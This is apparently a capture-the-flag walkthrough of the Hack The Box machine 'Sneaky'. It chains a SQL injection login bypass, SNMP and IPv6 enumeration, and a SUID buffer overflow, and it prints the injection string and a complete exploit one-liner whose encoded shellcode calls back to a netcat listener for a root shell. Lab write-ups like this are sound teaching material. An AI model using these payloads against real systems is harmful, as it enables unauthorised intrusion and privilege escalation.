Sneaky — HTB walkthrough
Sneak your way in. SQL injection, SNMP exploit, IPv6 and Buffer Overflow, and what not made this machine really a good source of learning. Things will not be easy, so sit back tight and seek how to accomplish things.
80 HTTP Enumeration
Visiting /dev directory
Tried running hydra to bruteforce password till we seek any other flaw
Then I tried SQL injection.
I tried them all on username and found that they didn’t work. After lots of trial I found username was not vulnerable but password field was . And
‘ or 1=1# worked there
We got two names and an SSH key
Copy the value of key. We also get hint in URL : administratorfordifficulttimes
This key is saved but since ssh port is closed we cannot login. Let’s enumerate UDP ports. The only useful port we see is SNMP
SNMP : Simple Network Management Protocol
Using msf modules for snmp
Use snmp_login to see login details
Refer : https://resources.infosecinstitute.com/snmp-pentesting/#gref
First we reconfirm that we have public string, for this we will use onesixtyone.
Now we will use SNMP walk to gain info about public string of sysName Value
And we get IPv6 value in decimal format:
Why do we do take IPv6 from here ?? because this is network configuration flaw. People harden TCP ports for IPv4 and usually forget IPv6. Remember doing PasswordAuthentication no under IPv4 addresses, won’t apply the same for IPv6, in /etc/ssh/sshd_config.
For getting HEX from decimal you can either use tool : enyx.py Or snmp-mibs-downloader.
1) For enyx.py :
python /opt/Enyx/enyx.py 2c public 10.10.10.20
2) For snmp-mibs-downloader ,
1) apt-get install snmp-mibs-downloader. < once this is downloaded>
2) nano /etc/snmp/snmp.conf and comment line which says , mibs:
3)Again do snmpwalk
Thus we have our IPv6 address. Now getting back to exploitation.
After we get IPv6 we will connect to SSH using that
Looking for SUID bits on, for user thrasivoulos
How to check if it is vulnerable or not ? Using ltrace
Run the program in gdb and disassemble main function
We see it copies some value. Let’s run the program providing it some value
2) Finding Offset
We see we have some overflow between value 300 to 400, fuzzing a little more shows the value should be between 360 to 370.
Now we will check value of esp eip and ebp
We will pass this value of EIP to pattern_offset.rb of metasploit-framework which will give us the exact memory size allocated for name, after which we can send our shellcode
3) Overwriting EIP
So now we will send 362 As and 4 Bs and 100 Cs to see the register value and overflow eip with B’s
Checking values in register again we see
We see Bs is at 0xff8b8fdc
Now we will send 0xff8b8fdc in place of B after setting break point and see if hits breakpoint
And since our breakpoint has hit so next step will be to send our shellcode with some padding
4) Generating Shellcode
Sending shellcode with some padding. We will be passing As’ to easily detect it in gdb
Running this on gdb of thrisovoulos
Verifying registers we see
Looking at registers
We see 90s returning back after somespace in register as highlighted above. So we will be selecting our eip somewhere between them and run it again. <Keep nc listener on at port 1234>
But what is this???? We spawned thrasivoulos shell …… This was because we ran our code inside gdb. Let’s run the same from home of thrasivoulos.
Ok so we need to go back to thrasivoulos shell run the command from there if any segmentation fault occurs, we need to repeat the process, that means
1) Run chal $(python -c ‘offset = 362; shell = “”;shell += “\xb8\xed\xb5\x6c\x4e\xd9\xc2\xd9\x74\x24\xf4\x5a\x29\xc9\xb1”;shell += “\x12\x83\xc2\x04\x31\x42\x0e\x03\xaf\xbb\x8e\xbb\x1e\x1f\xb9”;shell += “\xa7\x33\xdc\x15\x42\xb1\x6b\x78\x22\xd3\xa6\xfb\xd0\x42\x89”;shell += “\xc3\x1b\xf4\xa0\x42\x5d\x9c\x38\xbf\x93\x5b\x55\xbd\xab\x67”;shell += “\x77\x48\x4a\xd7\x11\x1b\xdc\x44\x6d\x98\x57\x8b\x5c\x1f\x35”;shell += “\x23\x31\x0f\xc9\xdb\xa5\x60\x02\x79\x5f\xf6\xbf\x2f\xcc\x81”;shell += “\xa1\x7f\xf9\x5c\xa1”;nop = “\x90”*(offset — len(shell));eip=”\xa0\xf7\xff\xbf”;payload=nop+shell+eip;print(payload);’) from home of thrasivoulos
2) If segmentation fault occurs go to gdb , run this command again, review the register, Select one address in between NOP space. Edit eip. Don’t forget to come out of gdb
3) Keep your netcat on at 1234
4) again run chal $(python <your code with new eip>)
So doing the same i.e., after I did the above hit and trial process I got my EIP at \x44\xf7\xff\xbf
And on netcat
Finally ROOTED !!!